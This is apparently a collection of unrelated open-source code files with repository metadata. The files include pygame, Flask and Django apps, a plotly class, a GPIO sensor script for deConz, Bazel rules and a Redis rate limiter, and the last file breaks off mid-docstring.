player can get while not player_closed_app: for event in pygame.event.get(): if event.type == pygame.QUIT: player_closed_app = True if new_game: pygame.draw.rect(game_display, pygame.Color('#b5c9a6'), pygame.Rect(0, score_y_margin, display_width, display_height - score_y_margin)) total_pairs = (num_cols * num_rows) / 2 max_score = total_pairs - 1 # player gets no credit for last two cards remaining pairs = range(1, total_pairs + 1) + range(1, total_pairs + 1) # create numbered pairs # calculate the width and height of the cards and the space between them card_horz_width = int((display_width * 0.8) / num_cols) space_horz_width = int((display_width * 0.2) / (num_cols + 1)) card_vert_height = int(((display_height - score_y_margin) * 0.8) / num_rows) space_vert_height = int(((display_height - score_y_margin) * 0.2) / (num_rows + 1)) # create cards and randomly assign the numbered pairs random.random() del cards[:] for row in range(1, num_rows + 1): for col in range(1, num_cols + 1): rnd_item = random.choice(pairs) pairs.remove(rnd_item) new_card_x = ((col - 1) * card_horz_width) + (col * space_horz_width) new_card_y = ((row - 1) * card_vert_height) + (row * space_vert_height) + score_y_margin crd = Card(new_card_x, new_card_y, card_horz_width, card_vert_height, back_col, front_col, solved_col, game_display, font_col, card_font, str(rnd_item)) cards.append(crd) crd.hide_card() score = 0 new_game = False if pygame.mouse.get_pressed()[0]: if surf_4x4_rect.collidepoint(pygame.mouse.get_pos()): # start new game 4 x 4 new_game = True num_cols = 4 num_rows = 4 pygame.time.wait(200) # wait 200ms to avoid multiple new game mouse click events if surf_6x6_rect.collidepoint(pygame.mouse.get_pos()): # start new game 6 x 6 new_game = True num_cols = 6 num_rows = 6 pygame.time.wait(200) if surf_8x8_rect.collidepoint(pygame.mouse.get_pos()): # start new game 8 x 8 new_game = True num_cols = 8 num_rows = 8 pygame.time.wait(200) for crd in cards: if crd.is_clicked(pygame.mouse.get_pos()) and crd.is_hidden() and crd.is_unsolved(): crd.show_card() pygame.display.flip() if pick_1 is None: pick_1 = crd # player picked first card else: # player picked second card. if pick_1.value == crd.value: # it is a match! pick_1.solved() crd.solved() if crd.times_seen > 1 and cards_remaining(cards) > 0: score += 1 # if you have seen the matching card at least once before, you get a point elif crd.times_seen == 1 and cards_remaining(cards) > 0: max_score -= 1 # no points for luck, we just reduce the max possible score pygame.time.wait(500) # show matching values for 500ms else: # it did not match pick_1.hide_card() crd.hide_card() matching_card = get_matching_card(cards, pick_1) if matching_card.times_seen > 0: score -= 1 # player has seen the matching card before! 1 point penalty! if crd.times_seen > 1: score -= 1 # player should have known this card was not a match! 1 point penalty! pygame.time.wait(1500) # show card values for 1.5sec pick_1 = None # get ready for next pair of selections by player break # update score surf_wrong = score_font.render("Score = " + str(score) + " out of " + str(max_score), True, score_txt_col) pygame.draw.rect(game_display, pygame.Color('black'), pygame.Rect(score_x_margin, 0, surf_wrong.get_width() + 100, score_y_margin)) game_display.blit(surf_wrong, (score_x_margin, (score_y_margin - surf_wrong.get_height()) / 2)) pygame.display.flip() # player existed application pygame.quit() quit()
3.578125
4
darts_search_space/imagenet/rlnas/evolution_search/config.py
megvii-model/RLNAS
17
11065
import os class config: host = 'zhangxuanyang.zhangxuanyang.ws2.hh-c.brainpp.cn' username = 'admin' port = 5672 exp_name = os.path.dirname(os.path.abspath(__file__)) exp_name = '-'.join(i for i in exp_name.split(os.path.sep) if i); test_send_pipe = exp_name + '-test-send_pipe' test_recv_pipe = exp_name + '-test-recv_pipe' net_cache = 'model_and_data/checkpoint_epoch_50.pth.tar' initial_net_cache = 'model_and_data/checkpoint_epoch_0.pth.tar' layers = 14 edges = 14 model_input_size = (1, 3, 224, 224) # Candidate operators blocks_keys = [ 'none', 'max_pool_3x3', 'avg_pool_3x3', 'skip_connect', 'sep_conv_3x3', 'sep_conv_5x5', 'dil_conv_3x3', 'dil_conv_5x5' ] op_num = len(blocks_keys) # Operators encoding NONE = 0 MAX_POOLING_3x3 = 1 AVG_POOL_3x3 = 2 SKIP_CONNECT = 3 SEP_CONV_3x3 = 4 SEP_CONV_5x5 = 5 DIL_CONV_3x3 = 6 DIL_CONV_5x5 = 7 time_limit=None #time_limit=0.050 speed_input_shape=[32,3,224,224] flops_limit=True max_flops=600*1e6 # max_flops=None max_epochs=20 select_num = 10 population_num = 50 mutation_num = 25 m_prob = 0.1 crossover_num = 25 momentum = 0.7 eps = 1e-5 # Enumerate all paths of a single cell paths = [[0, 2, 3, 4, 5], [0, 2, 3, 5], [0, 2, 4, 5], [0, 2, 5], [0, 3, 4, 5], [0, 3, 5], [0, 4, 5], [0, 5], [1, 2, 3, 4, 5], [1, 2, 3, 5], [1, 2, 4, 5], [1, 2, 5], [1, 3, 4, 5], [1, 3, 5], [1, 4, 5], [1, 5], [0, 2, 3, 4], [0, 2, 4], [0, 3, 4], [0, 4], [1, 2, 3, 4], [1, 2, 4], [1, 3, 4], [1, 4], [0, 2, 3], [0, 3], [1, 2, 3], [1, 3], [0, 2], [1, 2]] for i in ['exp_name']: print('{}: {}'.format(i,eval('config.{}'.format(i))))
1.5625
2
packages/python/plotly/plotly/graph_objs/layout/geo/_projection.py
eranws/plotly.py
0
11066
<reponame>eranws/plotly.py<filename>packages/python/plotly/plotly/graph_objs/layout/geo/_projection.py<gh_stars>0 from plotly.basedatatypes import BaseLayoutHierarchyType as _BaseLayoutHierarchyType import copy as _copy class Projection(_BaseLayoutHierarchyType): # class properties # -------------------- _parent_path_str = "layout.geo" _path_str = "layout.geo.projection" _valid_props = {"parallels", "rotation", "scale", "type"} # parallels # --------- @property def parallels(self): """ For conic projection types only. Sets the parallels (tangent, secant) where the cone intersects the sphere. The 'parallels' property is an info array that may be specified as: * a list or tuple of 2 elements where: (0) The 'parallels[0]' property is a number and may be specified as: - An int or float (1) The 'parallels[1]' property is a number and may be specified as: - An int or float Returns ------- list """ return self["parallels"] @parallels.setter def parallels(self, val): self["parallels"] = val # rotation # -------- @property def rotation(self): """ The 'rotation' property is an instance of Rotation that may be specified as: - An instance of :class:`plotly.graph_objs.layout.geo.projection.Rotation` - A dict of string/value properties that will be passed to the Rotation constructor Supported dict properties: lat Rotates the map along meridians (in degrees North). lon Rotates the map along parallels (in degrees East). Defaults to the center of the `lonaxis.range` values. roll Roll the map (in degrees) For example, a roll of 180 makes the map appear upside down. Returns ------- plotly.graph_objs.layout.geo.projection.Rotation """ return self["rotation"] @rotation.setter def rotation(self, val): self["rotation"] = val # scale # ----- @property def scale(self): """ Zooms in or out on the map view. A scale of 1 corresponds to the largest zoom level that fits the map's lon and lat ranges. The 'scale' property is a number and may be specified as: - An int or float in the interval [0, inf] Returns ------- int|float """ return self["scale"] @scale.setter def scale(self, val): self["scale"] = val # type # ---- @property def type(self): """ Sets the projection type. The 'type' property is an enumeration that may be specified as: - One of the following enumeration values: ['equirectangular', 'mercator', 'orthographic', 'natural earth', 'kavrayskiy7', 'miller', 'robinson', 'eckert4', 'azimuthal equal area', 'azimuthal equidistant', 'conic equal area', 'conic conformal', 'conic equidistant', 'gnomonic', 'stereographic', 'mollweide', 'hammer', 'transverse mercator', 'albers usa', 'winkel tripel', 'aitoff', 'sinusoidal'] Returns ------- Any """ return self["type"] @type.setter def type(self, val): self["type"] = val # Self properties description # --------------------------- @property def _prop_descriptions(self): return """\ parallels For conic projection types only. Sets the parallels (tangent, secant) where the cone intersects the sphere. rotation :class:`plotly.graph_objects.layout.geo.projection.Rota tion` instance or dict with compatible properties scale Zooms in or out on the map view. A scale of 1 corresponds to the largest zoom level that fits the map's lon and lat ranges. type Sets the projection type. """ def __init__( self, arg=None, parallels=None, rotation=None, scale=None, type=None, **kwargs ): """ Construct a new Projection object Parameters ---------- arg dict of properties compatible with this constructor or an instance of :class:`plotly.graph_objs.layout.geo.Projection` parallels For conic projection types only. Sets the parallels (tangent, secant) where the cone intersects the sphere. rotation :class:`plotly.graph_objects.layout.geo.projection.Rota tion` instance or dict with compatible properties scale Zooms in or out on the map view. A scale of 1 corresponds to the largest zoom level that fits the map's lon and lat ranges. type Sets the projection type. Returns ------- Projection """ super(Projection, self).__init__("projection") if "_parent" in kwargs: self._parent = kwargs["_parent"] return # Validate arg # ------------ if arg is None: arg = {} elif isinstance(arg, self.__class__): arg = arg.to_plotly_json() elif isinstance(arg, dict): arg = _copy.copy(arg) else: raise ValueError( """\ The first argument to the plotly.graph_objs.layout.geo.Projection constructor must be a dict or an instance of :class:`plotly.graph_objs.layout.geo.Projection`""" ) # Handle skip_invalid # ------------------- self._skip_invalid = kwargs.pop("skip_invalid", False) # Populate data dict with properties # ---------------------------------- _v = arg.pop("parallels", None) _v = parallels if parallels is not None else _v if _v is not None: self["parallels"] = _v _v = arg.pop("rotation", None) _v = rotation if rotation is not None else _v if _v is not None: self["rotation"] = _v _v = arg.pop("scale", None) _v = scale if scale is not None else _v if _v is not None: self["scale"] = _v _v = arg.pop("type", None) _v = type if type is not None else _v if _v is not None: self["type"] = _v # Process unknown kwargs # ---------------------- self._process_kwargs(**dict(arg, **kwargs)) # Reset skip_invalid # ------------------ self._skip_invalid = False
2.828125
3
j3d/string_table.py
blank63/j3dview
13
11067
from btypes.big_endian import * cstring_sjis = CString('shift-jis') class Header(Struct): string_count = uint16 __padding__ = Padding(2) class Entry(Struct): string_hash = uint16 string_offset = uint16 def unsigned_to_signed_byte(b): return b - 0x100 if b & 0x80 else b def calculate_hash(string): h = 0 for b in string: h = (h*3 + unsigned_to_signed_byte(b)) & 0xFFFF return h def pack(stream, strings): strings = [string.encode('shift-jis') for string in strings] header = Header() header.string_count = len(strings) Header.pack(stream, header) offset = Header.sizeof() + Entry.sizeof()*len(strings) for string in strings: entry = Entry() entry.string_hash = calculate_hash(string) entry.string_offset = offset Entry.pack(stream, entry) offset += len(string) + 1 for string in strings: stream.write(string) stream.write(b'\0') def unpack(stream): base = stream.tell() header = Header.unpack(stream) entries = [Entry.unpack(stream) for _ in range(header.string_count)] strings = [] for entry in entries: stream.seek(base + entry.string_offset) strings.append(cstring_sjis.unpack(stream)) return strings
2.6875
3
deConzSensors.py
peterstadler/deConzSensors
0
11068
#!/usr/bin/env python3.5 from time import sleep, time from datetime import datetime, timedelta from pid.decorator import pidfile #from subprocess import call from RPi import GPIO import requests import json #import config import logging import signal import sys #13: grün #16: braun #19: orange #20: grün #21: braun #26: orange SENSORS = [ { "GPIOpinIN": 26, "GPIOpinOUT": 19, "SENSORID": 4, "NAME": "Garagentor" }, { "GPIOpinIN": 20, "GPIOpinOUT": 13, "SENSORID": 2, "NAME": "Garagentür" } ] # deConz REST API settings APIKEY = "" # API key for the deConz REST API APIHOST = "" # IP address of the deConz REST API, e.g. "192.168.1.100" APISCHEME = "http" # scheme for the deConz REST API, e.g. "http" # program settings POLL_INTERVALL = 7 # duration in seconds to wait between polls logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s', filename='/var/log/deConzSensors.log') class mySensor: def ping(self): GPIO.output(self.gpio_out, 1) sumOfStates = 0 for i in range(10): # get 10 samples of the door state curState = GPIO.input(self.gpio_in) logging.debug('current state of ' + self.name + ': ' + str(curState)) sumOfStates += curState sleep(0.1) GPIO.output(self.gpio_out, 0) if sumOfStates < 5: if self.door_open == False: logging.info(self.name + ' opened') self.door_open = True setRemoteSensor(True, self.sensor_id) else: if self.door_open == True: logging.info(self.name + ' closed') setRemoteSensor(False, self.sensor_id) self.door_open = False #delta = (datetime.now() - self.open_since).seconds # delta in seconds between now and the door open state #logging.debug(self.name + ': delta: ' + str(delta) + ' – GPIO input ' + str(self.gpio_in)) #if self.door_open and (delta > (2 * POLL_INTERVALL)): # only set remote sensor when we have 2 consecutive misses # logging.warning(self.name + ' open') # setRemoteSensor(True, self.sensor_id) #self.door_open = True #def updateLocalSettings(self, channel): # logging.debug(self.name + ': Callback fired for GPIO input ' + str(channel)) # self.door_open = False # self.open_since = datetime.now() def __init__(self, sensor_config): self.door_open = True self.open_since = datetime.now() self.gpio_in = sensor_config["GPIOpinIN"] self.gpio_out = sensor_config["GPIOpinOUT"] self.sensor_id = sensor_config["SENSORID"] self.name = sensor_config["NAME"] GPIO.setup(sensor_config["GPIOpinIN"], GPIO.IN, pull_up_down=GPIO.PUD_DOWN) GPIO.setup(sensor_config["GPIOpinOUT"], GPIO.OUT, initial=GPIO.LOW) #GPIO.add_event_detect(sensor_config["GPIOpinIN"], GPIO.RISING, callback=self.updateLocalSettings, bouncetime=250) def terminate(signum, frame): logging.info("******************** Terminating ******************** ") logging.debug('Signal handler called with signal ' + str(signum)) GPIO.cleanup() logging.info("************************ Exit *********************** ") sys.exit(0) def init(): logging.info("******************** Starting up ******************** ") signal.signal(signal.SIGINT, terminate) signal.signal(signal.SIGTERM, terminate) GPIO.setmode(GPIO.BCM) mySensors = [] for sensor in SENSORS: logging.info("adding sensor '" + sensor["NAME"] + "' at GPIO pin " + str(sensor["GPIOpinIN"])) mySensors.append(mySensor(sensor)) logging.info("***************************************************** ") return mySensors def setRemoteSensor(open, sensor_id): url = APISCHEME + "://" + APIHOST + "/api/" + APIKEY + "/sensors/" + str(sensor_id) + "/state" payload = {'open': str(open).lower()} r = requests.put(url, data=json.dumps(payload)) r.raise_for_status() logging.debug('setting remote sensor ' + str(sensor_id) + ' to ' + str(open)) # creating a PID file to prevent double execution of this script @pidfile() def main(): sensors=init() # initialize everything while True: # idle loop for sensor in sensors: sensor.ping() sleep(POLL_INTERVALL / len(sensors)) # sleep for the duration given as POLL_INTERVALL if __name__ == '__main__': main()
2.484375
2
src/admin.py
kappa243/agh-db-proj
0
11069
<filename>src/admin.py from flask import Blueprint, request, render_template, flash, redirect, url_for from flask_login import login_user, login_required, current_user, logout_user from models import User from werkzeug.security import generate_password_hash, check_password_hash from app import db, login_manager admin = Blueprint('admin', __name__) @admin.route('/admin', methods=['POST', 'GET']) @login_required def admin_panel(): if current_user.is_authenticated: user = User.query.get(int(current_user.get_id())) if not user.admin: return redirect(url_for('index')) users = User.query.order_by(User.id).all() if request.method == 'POST': if 'edit_user' in request.form: old_username = request.form['edit_user'] user = db.session.query(User).filter_by(username=old_username).with_for_update().first() username = request.form['username'] password = request.form['password'] if len(username) > 0: user.username = username if len(password) > 0: if len(password) >= 3: user.password = generate_password_hash(password, method='<PASSWORD>') else: flash('Password must be minimum 3 characters long') if 'grant_admin' in request.form: user.admin = True if 'remove_admin' in request.form: user.admin = False if 'delete' in request.form: old_username = request.form['delete'] User.query.filter_by(username=old_username).with_for_update().delete() db.session.commit() return redirect(url_for('admin.admin_panel')) return render_template('admin_panel.html', users=users)
2.40625
2
test/lib/test_map.py
oldmantaiter/inferno
1
11070
import datetime import types from nose.tools import eq_ from nose.tools import ok_ from inferno.lib.map import keyset_map from inferno.lib.rule import InfernoRule class TestKeysetMap(object): def setUp(self): self.data = { 'city': 'toronto', 'country': 'canada', 'population': 100, 'size': 1000, 'date': datetime.date(2012, 12, 01)} self.rule = InfernoRule( key_parts=['country', 'city'], value_parts=['population', 'size']) def test_keys_and_parts(self): expected = [('["_default","canada","toronto"]', [100, 1000])] self._assert_map(self.data, self.rule, expected) def test_missing_key_part_should_not_yield_result(self): del self.data['city'] expected = [] self._assert_map(self.data, self.rule, expected) def test_missing_value_part_should_yield_result(self): del self.data['size'] expected = [('["_default","canada","toronto"]', [100, 0])] self._assert_map(self.data, self.rule, expected) def test_null_key_part_should_not_yield_result(self): self.data['city'] = None expected = [] self._assert_map(self.data, self.rule, expected) def test_null_value_part_should_yield_result(self): self.data['size'] = None expected = [('["_default","canada","toronto"]', [100, None])] self._assert_map(self.data, self.rule, expected) def test_empty_key_part_should_yield_result(self): self.data['city'] = '' expected = [('["_default","canada",""]', [100, 1000])] self._assert_map(self.data, self.rule, expected) def test_empty_value_part_should_yield_result(self): self.data['size'] = '' expected = [('["_default","canada","toronto"]', [100, ''])] self._assert_map(self.data, self.rule, expected) def test_map_serialization(self): # key parts are str casted & json serialized, value parts are are not # (note the difference between the key date and value date results) rule = InfernoRule( key_parts=['date'], value_parts=['date']) expected = [('["_default","2012-12-01"]', [datetime.date(2012, 12, 1)])] self._assert_map(self.data, rule, expected) def test_field_transforms(self): def upper(val): return val.upper() rule = InfernoRule( key_parts=['country', 'city'], value_parts=['population', 'size'], field_transforms={'city': upper, 'country': upper}) expected = [('["_default","CANADA","TORONTO"]', [100, 1000])] self._assert_map(self.data, rule, expected) def test_parts_preprocess_that_yields_multiple_parts(self): def lookup_language(parts, params): for language in ['french', 'english']: parts_copy = parts.copy() parts_copy['language'] = language yield parts_copy rule = InfernoRule( key_parts=['country'], value_parts=['language'], parts_preprocess=[lookup_language]) expected = [ ('["_default","canada"]', ['french']), ('["_default","canada"]', ['english'])] self._assert_map(self.data, rule, expected) def test_field_transforms_happen_after_parts_preprocess(self): def lookup_language(parts, params): for language in ['french', 'english']: parts_copy = parts.copy() parts_copy['language'] = language yield parts_copy def upper(val): return val.upper() rule = InfernoRule( key_parts=['country'], value_parts=['language'], parts_preprocess=[lookup_language], field_transforms={'language': upper}) expected = [ ('["_default","canada"]', ['FRENCH']), ('["_default","canada"]', ['ENGLISH'])] self._assert_map(self.data, rule, expected) def _assert_map(self, parts, rule, expected): # turn disco_debug on for more code coverage rule.params.disco_debug = True actual = keyset_map(parts, rule.params) ok_(isinstance(actual, types.GeneratorType)) eq_(list(actual), expected)
2.4375
2
dart/build_rules/internal/pub.bzl
nickclmb/rules_dart
0
11071
<reponame>nickclmb/rules_dart # Copyright 2016 The Bazel Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. _pub_uri = "https://storage.googleapis.com/pub.dartlang.org/packages" """A set of BUILD rules that facilitate using or building on "pub".""" def _pub_repository_impl(repository_ctx): package = repository_ctx.attr.package version = repository_ctx.attr.version repository_ctx.download_and_extract( "%s/%s-%s.tar.gz" % (_pub_uri, package, version), repository_ctx.attr.output, ) pub_deps = repository_ctx.attr.pub_deps bazel_deps = ["\"@vendor_%s//:%s\"" % (dep, dep) for dep in pub_deps] deps = ",\n".join(bazel_deps) repository_ctx.file( "%s/BUILD" % (repository_ctx.attr.output), """ load("@io_bazel_rules_dart//dart/build_rules:core.bzl", "dart_library") package(default_visibility = ["//visibility:public"]) filegroup(name = "LICENSE_FILES", srcs=["LICENSE"]) dart_library( name = "%s", srcs = glob(["lib/**"]), license_files = ["LICENSE"], pub_pkg_name = "%s", deps = [ %s ], ) """ % (package, package, deps), ) pub_repository = repository_rule( attrs = { "output": attr.string(), "package": attr.string(mandatory = True), "version": attr.string(mandatory = True), "pub_deps": attr.string_list(default = []), }, implementation = _pub_repository_impl, )
1.6875
2
auror_core/__init__.py
millengustavo/auror-core
11
11072
<reponame>millengustavo/auror-core<gh_stars>10-100 import copy import os class Project(object): def __init__(self, folder, *jobtypes): self.jobtypes = jobtypes self.folder = folder self.params = [] self.version = 1 def is_v2(self): self.version = 2 return copy.deepcopy(self) def is_v1(self): self.version = 1 return copy.deepcopy(self) def with_params(self, *paramtypes): self.params = paramtypes return copy.deepcopy(self) def write(self): for param in self.params: param._add_items() param._write(self.folder) for jobtype in self.jobtypes: jobtype._add_items() jobtype._write(self.folder) if self.version == 2: project_path = os.path.join(self.folder, 'flow20.project') with open(project_path, 'w') as project: project.write('azkaban-flow-version: 2.0')
2.609375
3
app.py
Vaishnavid14/snakegame
5
11073
<reponame>Vaishnavid14/snakegame<filename>app.py ''' Purpose: Server responsible for routing Author: Md. <NAME> Command to execute: python app.py ''' from flask import Flask from flask import render_template from flask import json from flask import request import random import sys app = Flask(__name__) print("Server is live...", file = sys.stderr) users = [] @app.route("/") def index(): return render_template("index.html"), 200 @app.route("/generate", methods = ["POST"]) def generate(): this_user = {} # init user send_data = {} # data to be sent post_obj = request.json rc = dimension(post_obj) send_data["x"] = rc["x"] send_data["y"] = rc["y"] send_data["speed"] = 20 this_user["name"] = post_obj["name"] # sets the user's name this_user["speed"] = send_data["speed"] # sets the user's speed this_user["size"] = 0 users.append(this_user) # append it to the list of users return json.dumps(send_data), 200 # sends the x and y coordinates to the client @app.route("/regenerate", methods = ["POST"]) def regenerate(): send_data = {} post_obj = request.json rc = dimension(post_obj) send_data["x"] = rc["x"] send_data["y"] = rc["y"] return json.dumps(send_data), 200 # sends the size of the snake to the server @app.route("/size", methods = ["POST"]) def size(): temp = {} obj_obj = request.json for i in range(len(users)): if obj_obj["name"] == users[i]["name"]: temp = users[i] users[users.index(temp)]["size"] += 1 send_data = {} send_data["size"] = users[users.index(temp)]["size"] return json.dumps(send_data), 200 ''' Function: dimensions Purpose: generates a random x and y coordinate within a limit to send it the client in: obj ''' def dimension(obj): rc = {} width_min = int(obj["width_min"]) width_max = int(obj["width_max"]) height_min = int(obj["height_min"]) height_max = int(obj["height_max"]) x = random_number(width_min, width_max) y = random_number(height_min, height_max) rc["x"] = x rc["y"] = y return rc ''' Function: random_number Purpose: generates a random number between a particular range in: min, max ''' def random_number(min, max): return random.randint(min, max) if __name__ == "__main__": app.run(host = "localhost", port = 2406, debug = True)
2.9375
3
grafana_api/api/__init__.py
sedan07/grafana_api
0
11074
<filename>grafana_api/api/__init__.py from .base import Base from .admin import Admin from .dashboard import Dashboard from .datasource import Datasource from .folder import Folder from .organisation import Organisation, Organisations from .search import Search from .user import User, Users
1.070313
1
shop/views.py
Ayushman-Singh/ecommerce
1
11075
from shop.forms import UserForm from django.views import generic from django.urls import reverse_lazy from django.shortcuts import render, redirect, get_object_or_404 from django.contrib.auth import authenticate, login, logout from django.contrib.auth.models import auth from .models import Product, Contact, Category, Product, Order, OrderItem from django.contrib import messages from django.views.decorators.csrf import ensure_csrf_cookie from math import ceil import json from shop.models import User from django.views.decorators.csrf import csrf_exempt # from PayTm import checksum # Create your views here. from django.http import HttpResponse from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger MERCHANT_KEY = 'Your-Merchant-Key-Here' def index(request, category_slug=None): category = None categories = Category.objects.all() products = Product.objects.filter(available=True) if category_slug: category = get_object_or_404(Category, slug=category_slug) products = products.filter(category=category) page = request.GET.get('page') paginator = Paginator(products, 6) try: products = paginator.page(page) except PageNotAnInteger: products = paginator.page(1) except EmptyPage: products = paginator.page(1) if request.user: print(request.user) pass # wishlist = Wishlist.objects.filter(user=request.user) return render( request, 'shop/index.html', { 'category': category, 'categories': categories, 'products': products, # 'wishlist': wishlist } ) else: return render( request, 'shop/index.html', { 'category': category, 'categories': categories, 'products': products, } ) def searchMatch(query, item): '''return true only if query matches the item''' if query in item.description.lower() or query in item.name.lower(): return True else: return False def search(request): query = request.GET.get('search') allProds = [] catprods = Product.objects.values('category', 'id') cats = {item['category'] for item in catprods} for cat in cats: prodtemp = Product.objects.filter(category=cat) prod = [item for item in prodtemp if searchMatch(query, item)] n = len(prod) nSlides = n // 4 + ceil((n / 4) - (n // 4)) if len(prod) != 0: allProds.append([prod, range(1, nSlides), nSlides]) params = { 'products': allProds, "msg": "" } if len(allProds) == 0 or len(query) < 4: params = { 'msg': "Please make sure to enter relevant search query" } return render(request, 'shop/search.html', params) def about(request): return render(request, 'shop/about.html') def contact(request): thank = False if request.method == "POST": name = request.POST.get('name', '') email = request.POST.get('email', '') phone = request.POST.get('phone', '') desc = request.POST.get('desc', '') contact = Contact(name=name, email=email, phone=phone, desc=desc) contact.save() thank = True return render(request, 'shop/contact.html', {'thank': thank}) def tracker(request): if request.method == "POST": orderId = request.POST.get('orderId', '') email = request.POST.get('email', '') try: order = Order.objects.filter(order_id=orderId, email=email) if len(order) > 0: update = OrderUpdate.objects.filter(order_id=orderId) updates = [] for item in update: updates.append( { 'text': item.update_desc, 'time': item.timestamp } ) response = json.dumps( { "status": "success", "updates": updates, "itemsJson": order[0].items_json }, default=str ) return HttpResponse(response) else: return HttpResponse('{"status":"noitem"}') except Exception as e: return HttpResponse('{"status":"error"}') return render(request, 'shop/tracker.html') def productView(request, myid): # Fetch the product using the id product = Product.objects.filter(id=myid) return render(request, 'shop/prodView.html', {'product': product[0]}) def checkout(request): if request.method == "POST": items_json = request.POST.get('itemsJson', '') name = request.POST.get('name', '') amount = request.POST.get('amount', '') email = request.POST.get('email', '') address = request.POST.get('address1', '') + \ " " + request.POST.get('address2', '') city = request.POST.get('city', '') state = request.POST.get('state', '') zip_code = request.POST.get('zip_code', '') phone = request.POST.get('phone', '') order = Order( name=name, email=email, address=address, state=state, # zip_code=zip_code, # phone=phone, # amount=amount ) order.save() order_item = OrderItem( order=order, price=amount, product_id=1, ) order_item.save() thank = True # id = order.order_id return render(request, 'shop/checkout.html', {'thank':thank, 'id': order.id}) # Request paytm to transfer the amount to your account after payment by user param_dict = { 'MID': 'Your-Merchant-Id-Here', 'ORDER_ID': str(order.order_id), 'TXN_AMOUNT': str(amount), 'CUST_ID': email, 'INDUSTRY_TYPE_ID': 'Retail', 'WEBSITE': 'WEBSTAGING', 'CHANNEL_ID': 'WEB', 'CALLBACK_URL': 'http://127.0.0.1:8000/handlerequest/', } # param_dict['CHECKSUMHASH'] = checksum.generate_checksum(param_dict, MERCHANT_KEY) # return render(request, '/paytm.html', {'param_dict': param_dict}) return render(request, 'shop/checkout.html') def signup(request): if request.method == 'POST': print('psot') form = UserForm(request.POST) if form.is_valid(): user = form.save(commit=False) # commit=False tells Django that "Don't send this to database yet. # I have more things I want to do with it." # import pdb;pdb.set_trace() if form.cleaned_data['type']=='Vendor': user.is_staff = True # Set the user object here user.save() return redirect("/admin/login") else: user.is_staff = False user.save() return redirect("/login") # Now you can send it to DB else: print('in valid vin vlaidpsot') form = UserForm() print(form.errors) return render( request, 'shop/signup.html',{ 'form':form, 'errors':form.errors }) else: print('hello jasfdjlasdjfs') form = UserForm() return render( request, 'shop/signup.html',{ 'form':form }) @csrf_exempt def handlerequest(request): # paytm will send you post request here form = request.POST response_dict = {} for i in form.keys(): response_dict[i] = form[i] if i == 'CHECKSUMHASH': checksum = form[i] # verify = Checksum.verify_checksum(response_dict, MERCHANT_KEY, checksum) # if verify: # if response_dict['RESPCODE'] == '01': # print('order successful') # else: # print('order was not successful because' + response_dict['RESPMSG']) return render(request, 'shop/paymentstatus.html', {'response': response_dict}) def vendor(request): user =User.objects.get(id=request.user.id) menu = {} return render(request, 'shop/restprofile.html', {'user':user}) from django.views.generic.edit import UpdateView class UserUpdate(UpdateView): model = User fields = ['name','email','first_name','last_name'] template_name_suffix = '_update_form'
2.0625
2
SimMuon/GEMDigitizer/python/muonGEMDigi_cff.py
NTrevisani/cmssw
3
11076
import FWCore.ParameterSet.Config as cms from SimMuon.GEMDigitizer.muonGEMDigis_cfi import * from SimMuon.GEMDigitizer.muonGEMPadDigis_cfi import * from SimMuon.GEMDigitizer.muonGEMPadDigiClusters_cfi import * muonGEMDigiTask = cms.Task(simMuonGEMDigis, simMuonGEMPadDigis, simMuonGEMPadDigiClusters) muonGEMDigi = cms.Sequence(muonGEMDigiTask)
1.09375
1
paas-ce/paas/esb/lib/redis_rate_limit/ratelimit.py
renmcc/bk-PaaS
767
11077
# -*- coding: utf-8 -*- """ Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available. Copyright (C) 2017-2018 THL A29 Limited, a Tencent company. All rights reserved. Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://opensource.org/licenses/MIT Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ # noqa """A distributed rate limiter rely on redis based on `token bucket <https://en.wikipedia.org/wiki/Token_bucket>` algorithm Usage ~~~~~ .. code-block:: python # Init a redis connection pool import redis redisdb = redis.Redis() rate = RateLimiter(redisdb, identifier='ip=127.0.0.1 path=/get_user_info/') # Allow 10 requests every 1 minute # period also accepts seconds/minutes/hours/days as key rate.add_rule(tokens=10, period={'minute': 1}) # You could add multiple rules for on limiter # rate.add_rule(tokens=200, period={'hour': 1}) print rate.acquire() # returns {'allowed': True, 'remaining_tokens': 9.0} """ import time import logging from redis import WatchError logger = logging.getLogger('root') class BaseRateLimiter(object): def __init__(self, redisdb, identifier, namespace='', tokens=None, period=None): """Init a RateLimiter class :param redisdb: a `redis.Redis` instance :param str identifier: identifier for the limiter, such as an user_id etc. :param str namespace: namespace for redis keys :param int tokens: maxium tokens for one time period :param dict period: dict, time period, such as {'minutes': 10} """ self.redisdb = redisdb self.identifier = identifier self.namespace = namespace self.rules = [] # Add rule if tokens is not None and period: self.add_rule(tokens, period) self.prepare() def prepare(self): """Prepare to work """ pass def add_rule(self, tokens, period): """Add multiple rules for this limiter, see `__init__` for parameter details """ rule = Rule(tokens, Rule.period_to_seonds(period)) self.rules.append(rule) def acquire(self, tokens=1): """Acquire for a single request :param int tokens: tokens to consume for this request, default to 1 """ if not self.rules: return {'allowed': True, 'remaining_tokens': 0} logger.debug('Start acquiring tokens by given rules, this operation may have several ' 'communications with redis.') rets = [] for rule in self.rules: logger.debug('Acquiring by single rule, rule=%s tokens=%s', rule, tokens) ret = self.acquire_by_single_rule(rule, tokens) logger.debug('Acquiring finished, result=%s', ret) if not ret['allowed']: logger.debug('Acquiring denied by given rule, rule=%s.', rule) return ret rets.append(ret) logger.debug('Acquiring successed.') return { 'allowed': True, 'remaining_tokens': min(x['remaining_tokens'] for x in rets) } class RateLimiter(BaseRateLimiter): """Rate limiter class """ def acquire_by_single_rule(self, rule, tokens=1): """Acquire an request quota from limiter :param rule: `Rule` object :param int tokens: tokens to be consumed, default 1 :returns: a dict of `allowed` and `remaining_tokens` - allowed: wheather this request is 